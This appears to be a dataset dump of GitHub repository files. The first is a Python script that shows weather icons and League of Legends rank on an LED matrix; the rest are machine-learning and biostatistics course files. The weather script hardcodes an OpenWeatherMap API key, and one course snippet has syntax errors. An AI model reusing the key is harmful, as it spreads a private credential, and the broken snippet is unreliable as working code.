ImageDraw.Draw(image_scattered_clouds)\n draw.text((0, 3), get_current_time(), font=font8, fill=\"#FFFFFF\")\n add_temperature_weather_image(image_scattered_clouds, curr_weather_temp_int)\n draw.text((29, 15), str(get_curr_weather_wind_speed(owm)) + \"MPH\", font=font8, fill=\"#FFFFFF\")\n draw.text((29, 23), wind_direction_name_dict[get_curr_weather_wind_direction(owm)], font=font8, fill=\"#FFFFFF\")\n add_small_sun_weather_image(image_scattered_clouds)\n add_two_clouds_weather_image(image_scattered_clouds)\n matrix.SetImage(image_scattered_clouds.im.id, 0, 0)\n time.sleep(30)\n matrix.Clear()\n\n\ndef display_few_weather(owm, curr_weather_temp_int, wind_direction_name_dict):\n image_few_clouds = Image.new(\"RGB\", (64, 32))\n draw = ImageDraw.Draw(image_few_clouds)\n draw.text((0, 3), get_current_time(), font=font8, fill=\"#FFFFFF\")\n add_temperature_weather_image(image_few_clouds, curr_weather_temp_int)\n draw.text((29, 15), str(get_curr_weather_wind_speed(owm)) + \"MPH\", font=font8, fill=\"#FFFFFF\")\n draw.text((29, 23), wind_direction_name_dict[get_curr_weather_wind_direction(owm)], font=font8, fill=\"#FFFFFF\")\n add_small_sun_weather_image(image_few_clouds)\n add_one_cloud_weather_image(image_few_clouds)\n matrix.SetImage(image_few_clouds.im.id, 0, 0)\n time.sleep(30)\n matrix.Clear()\n\n\ndef display_clear_weather(owm, curr_weather_temp_int, wind_direction_name_dict):\n image_clear_sky = Image.new(\"RGB\", (64, 32))\n draw = ImageDraw.Draw(image_clear_sky)\n draw.text((0, 3), get_current_time(), font=font8, fill=\"#FFFFFF\")\n add_temperature_weather_image(image_clear_sky, curr_weather_temp_int)\n draw.text((29, 15), str(get_curr_weather_wind_speed(owm)) + \"MPH\", font=font8, fill=\"#FFFFFF\")\n draw.text((29, 23), wind_direction_name_dict[get_curr_weather_wind_direction(owm)], font=font8, fill=\"#FFFFFF\")\n draw.ellipse(((39, 1), (51, 13)), fill=\"#FFBB00\")\n matrix.SetImage(image_clear_sky.im.id, 0, 0)\n time.sleep(30)\n matrix.Clear()\n\n\ndef 
display_thunderstorm_weather(owm, curr_weather_temp_int, wind_direction_name_dict):\n image_thunderstorm = Image.new(\"RGB\", (64, 32))\n draw = ImageDraw.Draw(image_thunderstorm)\n draw.text((0, 3), get_current_time(), font=font8, fill=\"#FFFFFF\")\n add_temperature_weather_image(image_thunderstorm, curr_weather_temp_int)\n draw.text((29, 15), str(get_curr_weather_wind_speed(owm)) + \"MPH\", font=font8, fill=\"#FFFFFF\")\n draw.text((29, 23), wind_direction_name_dict[get_curr_weather_wind_direction(owm)], font=font8, fill=\"#FFFFFF\")\n # CLOUD 1\n draw.line((42, 3, 43, 3), fill=\"#BABABA\")\n draw.line((40, 4, 45, 4), fill=\"#BABABA\")\n draw.line((38, 5, 47, 5), fill=\"#BABABA\")\n draw.line((37, 6, 48, 6), fill=\"#BABABA\")\n draw.line((37, 7, 48, 7), fill=\"#BABABA\")\n draw.line((38, 8, 47, 8), fill=\"#BABABA\")\n draw.line((39, 9, 46, 9), fill=\"#BABABA\")\n # TINY CLOUD 1\n draw.line((51, 2, 52, 2), fill=\"#FFFFFF\")\n draw.line((49, 3, 54, 3), fill=\"#FFFFFF\")\n draw.line((50, 4, 53, 4), fill=\"#FFFFFF\")\n # TINY CLOUD 2\n draw.line((53, 6, 54, 6), fill=\"#FFFFFF\")\n draw.line((51, 7, 56, 7), fill=\"#FFFFFF\")\n draw.line((52, 8, 55, 8), fill=\"#FFFFFF\")\n # LIGHTNING BOLT\n draw.line((42, 10, 44, 10), fill=\"#FFED11\")\n draw.line((43, 11, 45, 11), fill=\"#FFED11\")\n draw.line((44, 11, 45, 11), fill=\"#FFED11\")\n draw.line((44, 12, 45, 12), fill=\"#FFED11\")\n draw.line((45, 13, 46, 13), fill=\"#FFED11\")\n # RAIN DROPS\n draw.line((51, 5, 52, 5), fill=\"#0078FF\")\n draw.line((52, 6, 52, 6), fill=\"#0078FF\")\n draw.line((52, 9, 52, 10), fill=\"#0078FF\")\n draw.line((54, 10, 54, 11), fill=\"#0078FF\")\n draw.line((55, 9, 55, 9), fill=\"#0078FF\")\n matrix.SetImage(image_thunderstorm.im.id, 0, 0)\n time.sleep(30)\n matrix.Clear()\n\n\ndef display_rain_weather(owm, curr_weather_temp_int, wind_direction_name_dict):\n image_rain = Image.new(\"RGB\", (64, 32))\n draw = ImageDraw.Draw(image_rain)\n draw.text((0, 3), get_current_time(), font=font8, 
fill=\"#FFFFFF\")\n add_temperature_weather_image(image_rain, curr_weather_temp_int)\n draw.text((29, 15), str(get_curr_weather_wind_speed(owm)) + \"MPH\", font=font8, fill=\"#FFFFFF\")\n draw.text((29, 23), wind_direction_name_dict[get_curr_weather_wind_direction(owm)], font=font8, fill=\"#FFFFFF\")\n # CLOUD 1\n draw.line((42, 3, 43, 3), fill=\"#BABABA\")\n draw.line((40, 4, 45, 4), fill=\"#BABABA\")\n draw.line((38, 5, 47, 5), fill=\"#BABABA\")\n draw.line((37, 6, 48, 6), fill=\"#BABABA\")\n draw.line((37, 7, 48, 7), fill=\"#BABABA\")\n draw.line((38, 8, 47, 8), fill=\"#BABABA\")\n draw.line((39, 9, 46, 9), fill=\"#BABABA\")\n # TINY CLOUD 1\n draw.line((51, 2, 52, 2), fill=\"#FFFFFF\")\n draw.line((49, 3, 54, 3), fill=\"#FFFFFF\")\n draw.line((50, 4, 53, 4), fill=\"#FFFFFF\")\n # TINY CLOUD 2\n draw.line((53, 6, 54, 6), fill=\"#FFFFFF\")\n draw.line((51, 7, 56, 7), fill=\"#FFFFFF\")\n draw.line((52, 8, 55, 8), fill=\"#FFFFFF\")\n # RAIN DROPS\n draw.line((40, 10, 40, 11), fill=\"#0078FF\")\n draw.line((43, 10, 43, 12), fill=\"#0078FF\")\n draw.line((45, 11, 45, 12), fill=\"#0078FF\")\n draw.line((41, 12, 41, 12), fill=\"#0078FF\")\n draw.line((42, 13, 42, 13), fill=\"#0078FF\")\n draw.line((44, 13, 44, 13), fill=\"#0078FF\")\n draw.line((46, 13, 46, 13), fill=\"#0078FF\")\n draw.line((46, 10, 46, 10), fill=\"#0078FF\")\n draw.line((51, 5, 52, 5), fill=\"#0078FF\")\n draw.line((52, 6, 52, 6), fill=\"#0078FF\")\n draw.line((52, 9, 52, 10), fill=\"#0078FF\")\n draw.line((54, 10, 54, 11), fill=\"#0078FF\")\n draw.line((55, 9, 55, 9), fill=\"#0078FF\")\n matrix.SetImage(image_rain.im.id, 0, 0)\n time.sleep(30)\n matrix.Clear()\n\n\ndef display_snow_weather(owm, curr_weather_temp_int, wind_direction_name_dict):\n image_snow = Image.new(\"RGB\", (64, 32))\n draw = ImageDraw.Draw(image_snow)\n draw.text((0, 3), get_current_time(), font=font8, fill=\"#FFFFFF\")\n add_temperature_weather_image(image_snow, curr_weather_temp_int)\n draw.text((29, 15), 
str(get_curr_weather_wind_speed(owm)) + \"MPH\", font=font8, fill=\"#FFFFFF\")\n draw.text((29, 23), wind_direction_name_dict[get_curr_weather_wind_direction(owm)], font=font8, fill=\"#FFFFFF\")\n # SNOWFLAKE 1\n draw.line((37, 2, 39, 4), fill=\"#FFFFFF\")\n draw.line((37, 4, 39, 2), fill=\"#FFFFFF\")\n # SNOWFLAKE 2\n draw.line((57, 3, 58, 3), fill=\"#FFFFFF\")\n draw.line((56, 4, 56, 4), fill=\"#FFFFFF\")\n draw.line((59, 4, 59, 4), fill=\"#FFFFFF\")\n draw.line((57, 5, 58, 5), fill=\"#FFFFFF\")\n # SNOWFLAKE 3\n draw.line((40, 7, 42, 7), fill=\"#FFFFFF\")\n draw.line((41, 6, 41, 8), fill=\"#FFFFFF\")\n # SNOWFLAKE 4\n draw.line((45, 6, 45, 7), fill=\"#FFFFFF\")\n draw.line((46, 5, 46, 6), fill=\"#FFFFFF\")\n # SNOWFLAKE 5\n draw.line((49, 5, 51, 7), fill=\"#FFFFFF\")\n draw.line((49, 7, 51, 5), fill=\"#FFFFFF\")\n # SNOWFLAKE 6\n draw.line((55, 8, 55, 8), fill=\"#FFFFFF\")\n draw.line((55, 10, 57, 8), fill=\"#FFFFFF\")\n # SNOWFLAKE 7\n draw.point((39, 11), fill=\"#FFFFFF\")\n draw.point((38, 12), fill=\"#FFFFFF\")\n draw.point((40, 12), fill=\"#FFFFFF\")\n draw.point((39, 13), fill=\"#FFFFFF\")\n # SNOWFLAKE 8\n draw.point((45, 9), fill=\"#FFFFFF\")\n draw.point((44, 10), fill=\"#FFFFFF\")\n draw.point((46, 10), fill=\"#FFFFFF\")\n draw.point((45, 11), fill=\"#FFFFFF\")\n # SNOWFLAKE 9\n draw.line((49, 12, 51, 12), fill=\"#FFFFFF\")\n draw.line((50, 11, 50, 13), fill=\"#FFFFFF\")\n matrix.SetImage(image_snow.im.id, 0, 0)\n time.sleep(30)\n matrix.Clear()\n\n\ndef display_mist_weather(owm, curr_weather_temp_int, wind_direction_name_dict):\n image_mist = Image.new(\"RGB\", (64, 32))\n draw = ImageDraw.Draw(image_mist)\n draw.text((0, 3), get_current_time(), font=font8, fill=\"#FFFFFF\")\n add_temperature_weather_image(image_mist, curr_weather_temp_int)\n draw.text((29, 15), str(get_curr_weather_wind_speed(owm)) + \"MPH\", font=font8, fill=\"#FFFFFF\")\n draw.text((29, 23), wind_direction_name_dict[get_curr_weather_wind_direction(owm)], font=font8, 
fill=\"#FFFFFF\")\n # LINE 1\n for x in range(0, 18):\n line_co1 = 38 + x\n line_co3 = 39 + x\n if line_co1 % 2 == 0:\n line_co2 = 5\n line_co4 = 4\n else:\n line_co2 = 4\n line_co4 = 5\n draw.line((line_co1, line_co2, line_co3, line_co4), fill=\"#CCCCCC\")\n # LINE 2\n for x in range(0, 18):\n line_co1 = 38 + x\n line_co3 = 39 + x\n if line_co1 % 2 == 0:\n line_co2 = 8\n line_co4 = 7\n else:\n line_co2 = 7\n line_co4 = 8\n draw.line((line_co1, line_co2, line_co3, line_co4), fill=\"#CCCCCC\")\n # LINE 3\n for x in range(0, 18):\n line_co1 = 38 + x\n line_co3 = 39 + x\n if line_co1 % 2 == 0:\n line_co2 = 11\n line_co4 = 10\n else:\n line_co2 = 10\n line_co4 = 11\n draw.line((line_co1, line_co2, line_co3, line_co4), fill=\"#CCCCCC\")\n matrix.SetImage(image_mist.im.id, 0, 0)\n time.sleep(30)\n matrix.Clear()\n\n\ndef display_tornado_weather(owm, curr_weather_temp_int, wind_direction_name_dict):\n image_tornado = Image.new(\"RGB\", (64, 32))\n draw = ImageDraw.Draw(image_tornado)\n draw.text((0, 3), get_current_time(), font=font8, fill=\"#FFFFFF\")\n add_temperature_weather_image(image_tornado, curr_weather_temp_int)\n draw.text((29, 15), str(get_curr_weather_wind_speed(owm)) + \"MPH\", font=font8, fill=\"#FFFFFF\")\n draw.text((29, 23), wind_direction_name_dict[get_curr_weather_wind_direction(owm)], font=font8, fill=\"#FFFFFF\")\n add_tornado_weather_image(image_tornado)\n matrix.SetImage(image_tornado.im.id, 0, 0)\n time.sleep(30)\n matrix.Clear()\n\n\ndef get_ranked_color(summoner_rank):\n if summoner_rank in ['Bronze 5', 'Bronze 4', 'Bronze 3', 'Bronze 2', 'Bronze 1']:\n rank_color = '#CD7F32'\n elif summoner_rank in ['Silver 5', 'Silver 4', 'Silver 3', 'Silver 2', 'Silver 1']:\n rank_color = '#C0C0C0'\n elif summoner_rank in ['Gold 5', 'Gold 4', 'Gold 3', 'Gold 2', 'Gold 1']:\n rank_color = '#FFD700'\n elif summoner_rank in ['Platinum 5', 'Platinum 4', 'Platinum 3', 'Platinum 2', 'Platinum 1']:\n rank_color = '#3F9896'\n elif summoner_rank in ['Diamond 5', 
'Diamond 4', 'Diamond 3', 'Diamond 2', 'Diamond 1']:\n rank_color = '#64BFDE'\n else:\n rank_color = \"#FFFFFF\"\n return rank_color\n\n\ndef get_lp_color(summoner_lp):\n if summoner_lp == 0:\n lp_color = \"#FF0000\"\n elif summoner_lp <= 75:\n lp_color = \"#FFFFFF\"\n else:\n lp_color = \"#0DBA3E\"\n return lp_color\n\n\ndef main():\n # PREPARATION: LEAGUE STUFF\n try:\n summoner_rank = get_league_stats()['rank']\n summoner_league_points = get_league_stats()['league_points']\n except TypeError:\n matrix.Clear()\n image_league_fail2 = Image.new(\"RGB\", (64, 32))\n draw2 = ImageDraw.Draw(image_league_fail2)\n draw2.text((1, 1), \"Enter your\", font=font7, fill=\"#FF0000\")\n draw2.text((1, 10), \"League and\", font=font7, fill=\"#FF0000\")\n draw2.text((1, 19), \"division:\", font=font7, fill=\"#FF0000\")\n matrix.SetImage(image_league_fail2.im.id, 0, 0)\n summoner_rank = input(\"\")\n matrix.Clear()\n image_league_fail3 = Image.new(\"RGB\", (64, 32))\n draw3 = ImageDraw.Draw(image_league_fail3)\n draw3.text((1, 1), \"Enter your\", font=font7, fill=\"#FF0000\")\n draw3.text((1, 10), \"League Points\", font=font7, fill=\"#FF0000\")\n matrix.SetImage(image_league_fail3.im.id, 0, 0)\n summoner_league_points = int(input(\"\"))\n # PREPARATION: WEATHER STUFF\n try:\n while True:\n try:\n owm = pyowm.OWM('5c50d5ab850e6a5ea0870a4794df3a9e')\n get_weather = owm.weather_at_id(5146277)\n curr_weather = get_weather.get_weather()\n curr_weather_code = curr_weather.get_weather_code()\n api_failure = False\n except pyowm.exceptions.api_call_error.APICallError:\n print('API Call Failed. 
Proceeding')\n api_failure = True\n # FIRST STEP: NAME\n for x in range(0, 6):\n matrix.Clear()\n image_name = Image.new(\"RGB\", (64, 32))\n draw = ImageDraw.Draw(image_name)\n draw.text((0, 0), \"Eli Vosniak\", font=font8, fill=\"#FFFFFF\")\n matrix.SetImage(image_name.im.id, get_rand_x(), get_rand_y())\n time.sleep(5)\n matrix.Clear()\n matrix.Clear()\n # SECOND STEP: LOL\n rank_color = get_ranked_color(summoner_rank)\n lp_color = get_lp_color(summoner_league_points)\n for x in range(0, 3):\n matrix.Clear()\n image_summoner_name = Image.new(\"RGB\", (64, 32))\n draw = ImageDraw.Draw(image_summoner_name)\n draw.text((1, 12), \"Finis Aeter num\", font=font7, fill=\"#FFFFFF\")\n matrix.SetImage(image_summoner_name.im.id, 0, 0)\n time.sleep(5)\n matrix.Clear()\n image_summoner_rank = Image.new(\"RGB\", (64, 32))\n draw2 = ImageDraw.Draw(image_summoner_rank)\n draw2.text((6, 6), summoner_rank, font=font8, fill=rank_color)\n draw2.text((30, 18), str(summoner_league_points) + \"LP\", font=font8, fill=lp_color)\n matrix.SetImage(image_summoner_rank.im.id, 0, 0)\n time.sleep(5)\n matrix.Clear()\n # STEP 3: WEATHER\n if not api_failure:\n if curr_weather_code == 804:\n display_overcast_weather(owm, get_curr_weather_temp(owm), WIND_DIRECTION_NAME_DICT)\n elif curr_weather_code == 803:\n display_broken_weather(owm, get_curr_weather_temp(owm), WIND_DIRECTION_NAME_DICT)\n elif curr_weather_code == 802:\n display_scattered_weather(owm, get_curr_weather_temp(owm), WIND_DIRECTION_NAME_DICT)\n elif curr_weather_code == 801:\n display_few_weather(owm, get_curr_weather_temp(owm), WIND_DIRECTION_NAME_DICT)\n elif curr_weather_code == 800:\n display_clear_weather(owm, get_curr_weather_temp(owm), WIND_DIRECTION_NAME_DICT)\n elif curr_weather_code in [200, 201, 202, 210, 211, 212, 221, 230, 231, 232]:\n display_thunderstorm_weather(owm, get_curr_weather_temp(owm), WIND_DIRECTION_NAME_DICT)\n elif curr_weather_code in [300, 301, 302, 310, 311, 312, 313, 314, 321, 500, 501, 502, 503, 
504, 511,\n 520, 521, 522, 531]:\n display_rain_weather(owm, get_curr_weather_temp(owm), WIND_DIRECTION_NAME_DICT)\n elif curr_weather_code in [600, 601, 602, 611, 612, 615, 616, 620, 621, 622]:\n display_snow_weather(owm, get_curr_weather_temp(owm), WIND_DIRECTION_NAME_DICT)\n elif curr_weather_code in [701, 711, 721, 731, 741, 751, 761, 762]:\n display_mist_weather(owm, get_curr_weather_temp(owm), WIND_DIRECTION_NAME_DICT)\n elif curr_weather_code in [781, 900]:\n display_tornado_weather(owm, get_curr_weather_temp(owm), WIND_DIRECTION_NAME_DICT)\n else:\n print('Failed')\n except KeyboardInterrupt:\n print('\\nQuitting...')\n matrix.Clear()\n\n\nmain()\n" } ]
1
erichilarysmithsr/Machine-Learning
https://github.com/erichilarysmithsr/Machine-Learning
0c46518e4c874f15e68718de9e43c289ab1869da
4a6a3aa84883ff14178310b0aab009ca85dcbd47
4b062a19fd489cf700bf0e7884b8774592561d69
refs/heads/master
2021-01-21T08:11:25.177594
2015-06-18T23:30:42
2015-06-18T23:30:42
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5047318339347839, "alphanum_fraction": 0.5520504713058472, "avg_line_length": 16.5, "blob_id": "7b701babfb062d04c99d25975bf7256857d1aeeb", "content_id": "0587c0caef884b4fdde555727af7490f87c357ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 317, "license_type": "no_license", "max_line_length": 50, "num_lines": 18, "path": "/CS373/Unit-1/unit-1_10.py", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Uniform-Probability-Quiz \n# Robot Localization\n\np=[0.2, 0.2, 0.2, 0.2, 0.2]\nworld=['green', 'red', 'red', 'green', 'green']\nZ = 'red'\npHit = 0.6\npMiss = 0.2\n\ndef sense(p, Z)\n\tq=[]\n\tn=len(p)\n\tfor i in range(n):\n\t\thit = Z == world[i])\n\t\tq.append(p[i] * (hit * pHit + (1-hit) * pMiss) )\n\treturn q\n\nprint sense(p, Z)\n\n\n" }, { "alpha_fraction": 0.5221425294876099, "alphanum_fraction": 0.5579923987388611, "avg_line_length": 24.64044952392578, "blob_id": "d59e356f0a5fa477deba6f94a155b7cfe27251cb", "content_id": "63bd099472e6ef490fdf19d6c5f4aed78f6f6a3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2371, "license_type": "no_license", "max_line_length": 94, "num_lines": 89, "path": "/AI-Class/Algorithms-Python/LinearRegression.py", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "import math\r\n\r\nclass LinearRegression:\r\n\t\"\"\" Computes the linear regression variables, w0 and w1, \r\n\tusing the formula from class:\r\n\t\r\n\tw1 = M * Sum( Xi * Yi ) - Sum( Xi ) * Sum( Yi ) / \r\n\t\t\t( M * Sum( Xi^2 ) - ( Sum( Xi )^2 )\r\n\r\n\tw0 = 1/M * Sum( Yi ) - w1 / M * Sum( Xi ) \r\n\t\t\r\n\tExample:\r\n\t>>> LinearRegression( [(2, 2), (4, 5), (6, 5), (8, 8)] ).regression()\r\n\t(0.5, 0.90000000000000002)\r\n\t\"\"\"\r\n\tdef __init__(self,v=[(2, 2), (4, 5), (6, 5), (8, 8)]):\r\n\t\t\tself.v = v\r\n\r\n\tdef x(self,i):\r\n\t\t\"The x 
coordinate of the element at index i\"\r\n\t\treturn self.v[i][0]\r\n\r\n\tdef y(self,i):\r\n\t\t\"The y coordinate of the element at index i\"\r\n\t\treturn self.v[i][1]\r\n\r\n\tdef square(self,x):\r\n\t\t\"Utility for computing the square of the argument (calls math.pow(x,2))\"\r\n\t\treturn math.pow(x,2)\r\n\r\n\tdef size(self):\r\n\t\t\"Returns the number of elements in the input vector\"\r\n\t\treturn len(self.v)\r\n\r\n\tdef range(self):\r\n\t\t\"The indexes to use in a for-loop (0..M-1)\"\r\n\t\treturn range(self.size())\r\n\r\n\tdef sum_xy(self):\r\n\t\t\"the sum of Xi * Yi\"\r\n\t\treturn sum( (self.x(i) * self.y(i)) for i in self.range())\r\n\r\n\tdef sum_x(self):\r\n\t\t\"the sum of Xi\"\r\n\t\treturn sum( self.x(i) for i in self.range() )\r\n\r\n\tdef sum_x2(self):\r\n\t\t\"the sum of Xi^2\"\r\n\t\treturn sum( self.square(self.x(i)) for i in self.range() )\r\n\r\n\tdef sum_y(self):\r\n\t\t\"the sum of Yi\"\r\n\t\treturn sum( self.y(i) for i in self.range() )\r\n\r\n\tdef w1(self):\r\n\t\t\"\"\" w1 = M * Sum( Xi * Yi ) - Sum( Xi ) * Sum( Yi ) / \r\n\t\t\t( M * Sum( Xi^2 ) - ( Sum( Xi )^2 ) \"\"\"\r\n\t\tm = self.size()\r\n\t\tsxy = self.sum_xy()\r\n\t\tsx = self.sum_x()\r\n\t\tsy = self.sum_y()\r\n\t\tsx2 = self.sum_x2()\r\n\t\treturn (m * sxy - sx*sy)/float( m * sx2 - self.square(sx) )\r\n\r\n\tdef w0(self):\r\n\t\t\" w0 = 1/M * Sum( Yi ) - w1 / M * Sum( Xi ) \"\r\n\t\tm = self.size()\r\n\t\tsy = self.sum_y()\r\n\t\tsx = self.sum_x()\r\n\t\treturn 1/float(m) * sy - self.w1()/float(m) * sx\r\n\r\n\tdef regression(self):\r\n\t\t\"\"\"Computes the linear regression variables and returns \r\n\t\t\t the result as a tuple consisting of (w0, w1) \"\"\"\r\n\t\treturn (self.w0(), self.w1())\r\n\r\n\tdef predictY(self,x):\r\n\t\t\"\"\"Predicts the y value using the w0 and w1 according to the formula:\r\n\t\t\t y = w1 * x + w0\r\n\t\t\"\"\"\r\n\t\treg = self.regression()\r\n\t\tw1=float(reg[1])\r\n\t\tw0=float(reg[0])\r\n\t\treturn (x, w1*x + w0)\r\n\r\n\tdef 
loss(self):\r\n\t\tw0=self.w0()\r\n\t\tw1=self.w1()\r\n\t\treturn sum( self.square(float(self.y(i)) - w1*float(self.x(i)) - w0) for i in self.range() )\r\n" }, { "alpha_fraction": 0.45390069484710693, "alphanum_fraction": 0.5141844153404236, "avg_line_length": 26.700000762939453, "blob_id": "9c0b490c651ee82ed43366697173fa21011e896e", "content_id": "2560fd4296a66a8178f76759aa027cf1dd95342f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 282, "license_type": "no_license", "max_line_length": 95, "num_lines": 10, "path": "/PH207x/excercises/Lesson7/Comparing Two Proportions.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Comparing Two Proportions #\n> P_1 vs P_2 => P_1 ?= P_2\n> P_1 - P_2 ?= 0\n\n> P_1 / P_2 ?= 1\tP_2 != 0\n\n## Odds ##\n> If the propability of an event A is p, then the *odds* of the event are p/(1-p), or p:(1-p) \n> If p is small then odds is ca. p: \n> p/(1-p) ~ P(1+p) for p ~ 0 \n\n\n\n" }, { "alpha_fraction": 0.5863414406776428, "alphanum_fraction": 0.6385365724563599, "avg_line_length": 47.761905670166016, "blob_id": "2276d0f5b43c49d634ad4f125196e0eea2bf0aef", "content_id": "aa5072770b004afdf13e69cb0f42a663e5f1145e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2056, "license_type": "no_license", "max_line_length": 401, "num_lines": 42, "path": "/PH207x/excercises/Lesson7/ Chi Square Goodness of Fit Test.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Chi Square Goodness of Fit Test - x² statistics #\n> \n> x²= SUM of all cells [ ( obs- exp )² / exp ] \n> d.f.=(#rows-1)(#columns-1) \n> \n\n\ttab diabetes1 sex1, chi col\n\ttab diabetes3 sex1, chi col\n\ttab diabetes3 sex1, chi col miss\n\n\n## Continuity correction factor ##\n> In 2x2 tables (only) we apply a continuity correction factor: \n> x²= SUM of all cells [ ( |obs-exp|-0.5 )² / exp 
] \n> \n> So x² is an idea of how far these expecteds are from these observed. \n\n\tcci 358 229 2492 2745\n\n# R X C Tables #\n> e.g. Accuracy of Death Certificates\n> CS= Certificate Status\n\n\ttabi 157 18 54\\268 44 34\n\nHospital | CS Conf. Accur. | CS Inacc. No. Ch. | CS Incorr. Recode | Total\n-------- | --------------- | ----------------- | ----------------- | --------\nComm. | 157 | 18 | 54 | 229\nTeach. | 268 | 44 | 34 | 346\nTotal | 425 | 62 | 88 | 575\n\n\ttab diabetes3 sex1, chi col miss\n\n> Now the null hypothesis is that it doesn't matter. The row classification is independent of the column classification.That means that take these 88, roughly a third of them should go up\nhere and a third of them should come down here.\n\n\ttabplot hospital status [iw=frequency],perc(status)\n\ttabplot hospital status [iw=frequency],perc(hospital)\n\n> When we submit this to Stata we get that the p-value is 0.001.That's telling us that when we compare this to that, 18 to the 24.7, 54 to the 35, to 268 and compare that to 255.7. When we compare what we actually observed to what we expect to see if **there is no relationship between the row and column classifications, then the value we get is much bigger than we would expect purely by chance.** \n> \n> And the p-value is there, less than 0.005. So we would reject this null hypothesis at the 0.05 level. And that is how we test an r by c. It's a simple extension of the two by two table except, remember, we don't do a continuity correction. 
We only do that with the two by two tables.\n\n\n" }, { "alpha_fraction": 0.7321107387542725, "alphanum_fraction": 0.7497302889823914, "avg_line_length": 76.22222137451172, "blob_id": "199a98fc4e4dae77804e5d476fb48eb3168d72db", "content_id": "3785934214b5bee3110cd77acf7c0ac89ce010b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2781, "license_type": "no_license", "max_line_length": 528, "num_lines": 36, "path": "/PH207x/homework/seven/Final Thoughts on the Blood Transfusion Trial.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Final Thoughts on the Blood Transfusion Trial #\n> Continue using the Fergusson et al. (2012) clinical trial example from the previous two problems to complete the following questions.\n\n#### 1. In the previous questions, we looked at three different tests of association: the Pearson Chi-square test, a 95% confidence interval for the odds ratio, and a risk difference test. ####\n\n##### Are the results of these three tests consistent? #####\n> Yes \n> No\n\n##### Would you expect the results of the three tests to be consistent? #####\n> Yes \n> No \n\n#### 2. Is there evidence of an association between blood group assignment and the composite outcome? #####\n> Yes \n> No\n\n#### 3. Think back to the Bonferroni correction from last week. If you were tasked with conducting hypothesis tests comparing the two blood groups for each of the 5 different outcomes, would you need to correct for multiple comparisons? #####\n> Yes \n> No\n\n\n#### 4. In this study, the authors state that they powered the study to detect an absolute difference of 15% in the two groups with 80% power, using a 2-sided test with alpha=0.05. After a few more adjustments, their final sample size calculation was 450. #####\n> Now suppose you want to replicate the study using a different population. 
Given that the authors did not find an association in their data, you decide to increase the power and decrease the difference detected between standard and fresh groups. Using an equal number of infants in both groups, what is the total sample size needed in order to achieve 90% power, assuming that the proportion of infants experiencing the composite outcome in the standard group was 55% and 45% in the fresh blood group (again, with alpha=0.05).\n> **Hint1:** You can simply use stata dropdown menus as follows ... Statistics >> Power and Sample size >> Tests of means and proportions >> 2 sample comparison proportions >> input your proportions in 0.** way >> go to options and adjust the significance level and the power >> hit submit ... finally use your calculator ....... Good luck \n\n\tsampsi .45 .55, alpha(0.05) power(0.90)\n\n> total sample size= **1088**\n\n\n#### 5. Consider a covariate, the clinical risk index for babies (CRIB), which was measured in the infants enrolled in the clinical trial. CRIB is usually associated with the composite outcome. From the baseline characteristics table in the Fergusson et al paper, we find that the median and IQR for CRIB is similar between the standard and fresh blood groups. This suggests that the distribution of CRIB is similar in both groups. #####\n> True or False: Because the distribution of CRIB is similar betwen groups, the study investigators would not have gained any power to detect an effect by matching on CRIB score. 
\n> \n> => **Yes** \n> No\n\n" }, { "alpha_fraction": 0.6743630766868591, "alphanum_fraction": 0.7285031676292419, "avg_line_length": 45.44444274902344, "blob_id": "a1c29f4f9d86c638d972d5cb786504a15f0c216e", "content_id": "5bc6a912dfee193626133fd5c4ab8573a411121a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1256, "license_type": "no_license", "max_line_length": 331, "num_lines": 27, "path": "/PH207x/homework/six/Bed Occupancy in Two Hospitals.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "#Bed Occupancy in Two Hospitals#\nAn investigator performs a bed-occupancy survey on July 1, 2012 at two hospitals (Hospital A and Hospital B). \nHospital A has 100 available beds. \nHospital B is larger with 200 available beds. \nHospital A reports that 80 of its beds are occupied on the day of the survey (occupancy prevalence = 0.80).\n\n1. The investigator reports a Prevalence Odds Ratio of 2.25 when comparing the occupancy prevalence of Hospital B to that for Hospital A. What is the occupancy prevalence for Hospital B on that day? \n\nPrevalence Odds Ratio=2.25\n\n(occ.bed/non occ bed)=2.25*4, \n(occ bed+non occ bed)=200\n(occ bed+non occ bed)=2.25*4*(non occ bed)+(non occ bed)=200\n\nocc bed= 9*(non occ bed)-non occ bed+(non occ bed)\n\nocc prev for hospB=occ bed/200\n\nJust sharing the step: We've known the total beds for\nHb = 200 \ny= 9/1\n\n1) OR(Hb to Ha) = OR(Hb)/ OR(Ha) \n2) OR(Hb) = OR(Hb to Ha)*OR(Ha)=2.25*4= y\n\n\nExample : Total students are 49. How many female and male students if the ratio is 3:4? Answer : *Female : (3/7)*49 = 21 *Male : (4/7)*49=28 Formula above is same to calculate OR(Hb) that I wrote. 
So, after you know the count of beds that occupied and not occupied in hospital B, ofcourse, you can calculate its occupied prevalance\n\n\n" }, { "alpha_fraction": 0.5829655528068542, "alphanum_fraction": 0.6003971695899963, "avg_line_length": 23.034990310668945, "blob_id": "d0c1825a201175e0fdf92f7bd6f052af908e25d3", "content_id": "b65531517f072155d8d6350a86103f6424f46088", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13596, "license_type": "no_license", "max_line_length": 115, "num_lines": 543, "path": "/AI-Class/Algorithms-Python/ValIter.py", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "\"\"\"\r\nA module for the value iteration algorithm for ai-class.com.\r\nThe simple Grid World is easily handled. How about other worlds?\r\n\"\"\"\r\n\r\nimport random\r\nimport math\r\n\r\n\r\n\r\n# Convenience hack for using 'a3', 